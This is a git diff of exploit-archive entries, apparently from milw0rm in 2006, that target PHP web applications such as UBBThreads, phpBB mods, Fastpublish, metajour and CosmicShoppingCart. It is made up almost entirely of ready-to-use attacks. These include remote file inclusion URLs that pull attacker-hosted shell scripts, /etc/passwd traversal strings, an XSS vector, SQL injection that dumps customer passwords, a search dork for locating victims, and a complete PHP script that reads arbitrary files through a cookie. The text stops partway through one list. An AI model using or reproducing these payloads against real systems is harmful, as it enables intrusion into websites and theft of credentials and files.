    +Welcome to Eggblog 2.x Remote Privilege Escalation +This exploit has been coded by nukedx +You can found original advisory on http://www.nukedx.com/?viewdoc=36 +Dork for this exploit: inurl:"powered by eggblog" +Your target must be like that: www.victim.com/Path/ +The sites you found with given dork has like: www.victim.com/eggblog/home/ or www.victim.com/home/ +If the site has /eggblog/home in link your target must be www.victim.com/eggblog/ +For second example your target must be www.victim.com/ +You can login with your admin account via www.victim.com/eggblog/admin/index.php +Have phun +
    +Target -> + + + + + +
    +
    +
    +
    + + + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1843.txt b/platforms/php/webapps/1843.txt index f46866d5b..80b3e2d5a 100755 --- a/platforms/php/webapps/1843.txt +++ b/platforms/php/webapps/1843.txt 
@@ -1,22 +1,22 @@ -UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on UBBThreads 5.x,6.x -Original advisory can be found at: http://www.nukedx.com/?viewdoc=40 -Succesful exploitation register_globals on -Version 6.x -GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE] -EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00 -GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE] -EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt? -EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00 -If php version < 4.1.0 or UBB version <= 5.x -GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE] -EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt? -EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00 -XSS: -GET -> http://[site]/[ubbpath]/index.php?debug=[XSS] -EXAMPLE -> http://[site]/[ubbpath]/index.php?debug= - -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on UBBThreads 5.x,6.x +Original advisory can be found at: http://www.nukedx.com/?viewdoc=40 +Succesful exploitation register_globals on +Version 6.x +GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE] +EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00 +GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE] +EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt? 
+EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00 +If php version < 4.1.0 or UBB version <= 5.x +GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE] +EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt? +EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00 +XSS: +GET -> http://[site]/[ubbpath]/index.php?debug=[XSS] +EXAMPLE -> http://[site]/[ubbpath]/index.php?debug= + +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1844.txt b/platforms/php/webapps/1844.txt index 1a0f542ed..a62a3e76f 100755 --- a/platforms/php/webapps/1844.txt +++ b/platforms/php/webapps/1844.txt 
@@ -1,15 +1,15 @@ -phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on phpBB 2.x (Activity MOD Plus) -Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 - -Succesful exploitation needs register_globals on -GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE] -EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00 -Requires magic_quotes_gpc off -EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt -Requires allow_url_fopen on - -# nukedx.com [2006-05-27] - -# milw0rm.com [2006-05-28] +phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on phpBB 2.x (Activity MOD Plus) +Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 + +Succesful exploitation needs register_globals on +GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE] +EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00 +Requires magic_quotes_gpc off +EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt +Requires allow_url_fopen on + +# nukedx.com [2006-05-27] + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1846.txt b/platforms/php/webapps/1846.txt index 07bf29cad..632354e25 100755 --- a/platforms/php/webapps/1846.txt +++ b/platforms/php/webapps/1846.txt 
@@ -1,10 +1,10 @@ -Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities -Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com -This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x -Original advisory can be found at: http://www.nukedx.com/?viewdoc=41 -Succesful exploitation needs register_globals on & allow url_fopen on -GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE] -EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt? -# nukedx.com [2006-05-28] - -# milw0rm.com [2006-05-28] +Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities +Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com +This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x +Original advisory can be found at: http://www.nukedx.com/?viewdoc=41 +Succesful exploitation needs register_globals on & allow url_fopen on +GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE] +EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt? +# nukedx.com [2006-05-28] + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1847.txt b/platforms/php/webapps/1847.txt index 5fb62c69c..137c2d9ca 100755 --- a/platforms/php/webapps/1847.txt +++ b/platforms/php/webapps/1847.txt 
@@ -1,12 +1,12 @@ -Software: CosmicShoppingCart (www.cosmicphp.com) -Risk: Medium -Discovered by: Vympel (Marcelo Almeida) -Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. - -SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin. - -Examples: -cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/* -cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs-- - -# milw0rm.com [2006-05-28] +Software: CosmicShoppingCart (www.cosmicphp.com) +Risk: Medium +Discovered by: Vympel (Marcelo Almeida) +Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed. + +SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin. + +Examples: +cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/* +cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs-- + +# milw0rm.com [2006-05-28] diff --git a/platforms/php/webapps/1848.txt b/platforms/php/webapps/1848.txt index 1d97ad3d6..76c1823f7 100755 --- a/platforms/php/webapps/1848.txt +++ b/platforms/php/webapps/1848.txt 
@@ -1,28 +1,28 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
-# Script site: http://www.fastpublish.org
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-
-http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]
-
-http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-29]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# Fastpublish CMS v 1.6.9.d - Remote File Include Vulnerabilities
+# Script site: http://www.fastpublish.org
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+
+http://www.site.com/[fastpublish_path]/drucken.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/drucken2.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/email_an_benutzer.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/rechnung.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/suche/search.php?config[fsBase]=[evil_scripts]
+
+http://www.site.com/[fastpublish_path]/adminbereich/admin.php?config[fsBase]=[evil_scripts]
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-29]
diff --git a/platforms/php/webapps/1851.txt b/platforms/php/webapps/1851.txt
index d0bfb7bc8..8fbec21c3 100755
--- a/platforms/php/webapps/1851.txt
+++ b/platforms/php/webapps/1851.txt
@@ -1,7 +1,7 @@
-# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
-# Script site: http://sourceforge.net/projects/gnopaste
-# made by SmokeZ (smoke.hes@gmail.com)
-
-http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?
-
-# milw0rm.com [2006-05-30]
+# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
+# Script site: http://sourceforge.net/projects/gnopaste
+# made by SmokeZ (smoke.hes@gmail.com)
+
+http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?
+
+# milw0rm.com [2006-05-30]
diff --git a/platforms/php/webapps/1853.php b/platforms/php/webapps/1853.php
index d2a3c8034..f98592ed6 100755
--- a/platforms/php/webapps/1853.php
+++ b/platforms/php/webapps/1853.php
@@ -1,137 +1,137 @@ -#!/usr/bin/php -q -d short_open_tag=on - 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; -} - -$host=$argv[1]; -$path=$argv[2]; -$path_to_file=$argv[3]; -if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) -{die("Check the path, it must begin and end with a trailing slash\r\n");} -$port=80; -$proxy=""; -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} - -$packet ="GET ".$p."randompic.php HTTP/1.0\r\n"; -$packet.="User-Agent: Googlebot/2.1\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: files[0]=".urlencode($path_to_file)."\r\n"; //through cookies, log this :) -$packet.="Connection: Close\r\n\r\n"; 
-#debug -#echo quick_dump($packet); -sendpacketii($packet); -echo $html; -?> - -# milw0rm.com [2006-05-31] +#!/usr/bin/php -q -d short_open_tag=on + 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$path_to_file=$argv[3]; +if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/')) +{die("Check the path, it must begin and end with a trailing slash\r\n");} +$port=80; +$proxy=""; +for ($i=4; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;} + +$packet ="GET ".$p."randompic.php HTTP/1.0\r\n"; +$packet.="User-Agent: Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: 
files[0]=".urlencode($path_to_file)."\r\n"; //through cookies, log this :) +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +echo $html; +?> + +# milw0rm.com [2006-05-31] diff --git a/platforms/php/webapps/1854.txt b/platforms/php/webapps/1854.txt index 4e546e1b0..d77c36e55 100755 --- a/platforms/php/webapps/1854.txt +++ b/platforms/php/webapps/1854.txt 
@@ -1,21 +1,21 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# ottoman_v1_1_2 - Remote File Include Vulnerabilities
-# Script site: http://prdownloads.sourceforge.net/ottoman/
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-
-http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
-http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
-http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]
-
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-31]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# ottoman_v1_1_2 - Remote File Include Vulnerabilities
+# Script site: http://prdownloads.sourceforge.net/ottoman/
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+
+http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
+http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
+http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]
+
+
+#Elo ;-)
+
+# milw0rm.com [2006-05-31]
diff --git a/platforms/php/webapps/1855.txt b/platforms/php/webapps/1855.txt
index d4014b894..9b98c2b65 100755
--- a/platforms/php/webapps/1855.txt
+++ b/platforms/php/webapps/1855.txt
@@ -1,95 +1,95 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#
-# metajour 2.1 (system_path) - Remote File Include Vulnerabilities
-# Script site: http://www.metajour.org
-# Find by Kacper (Rahim).
-# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi ;-)
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Special greetz DragonHeart :***
-# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
-#
-##################################################################
-expl:
-
-http://www.site.com/[metajour_path]/app/edocument/edocument_basic_view_menu.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_document_model_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_document_view_list.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listactive.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edoccorrectionclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocformclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocresponsibleclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_basic_view_menu.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_layoutelement_view_init.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_model_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_combi.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listactive.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listclosed.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/eproject_projectelement_model_update.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutelementclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectelementclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_basic_view_menu.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseawait.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseclose.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_casedone.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseopen.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_model_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_combi.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_create.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listactive.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listawait.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listclosed.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listdone.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/erek_comp_view_search.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compcauseclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compcountryclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compdecisionclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compdepartmentclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compsolutionclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/app/erek/core/erek_compunitclass.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/basicextension.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/article/article.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/article/article.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/breadcrumb/breadcrumb.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/bulletinboard/bulletinboard.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/cform/cform.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/cform/cform.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/changepassword/changepassword.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/filelist/filelist.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/filelist/filelist.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forgottenpassword/forgottenpassword.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forum/forum.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forum/forum.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/forum/forumdata.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/gallery/gallery.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/gallery/gallery.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/index/index.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/indexadv/indexadv.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listcomment/listcomment.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listing/listing.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listing/listing.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listing/listing_view_combidialog.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listlatestdoc/listlatestdoc.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/listpopulardoc/listpopulardoc.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/login/login.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/menu/menu.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/online/online.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/register/register.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/related/related.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/search/search.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/search/search.datatype.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/shop/shop.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/sitemap/sitemap.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/sitemap/sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/slide/slide.class.php?system_path=[evil_scripts]
-http://www.site.com/[metajour_path]/extension/uptodate/uptodate.class.php?system_path=[evil_scripts]
-
-#Elo ;-)
-
-# milw0rm.com [2006-05-31]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#
+# metajour 2.1 (system_path) - Remote File Include Vulnerabilities
+# Script site: http://www.metajour.org
+# Find by Kacper (Rahim).
+# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi ;-)
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Special greetz DragonHeart :***
+# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
+#
+##################################################################
+expl:
+
+http://www.site.com/[metajour_path]/app/edocument/edocument_basic_view_menu.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_document_model_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_document_view_list.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listactive.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edoccorrectionclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocformclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocresponsibleclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_basic_view_menu.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_layoutelement_view_init.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_model_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_combi.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_create.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listactive.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listclosed.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/eproject_projectelement_model_update.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutclass.php?system_path=[evil_scripts]
+http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutelementclass.php?system_path=[evil_scripts]
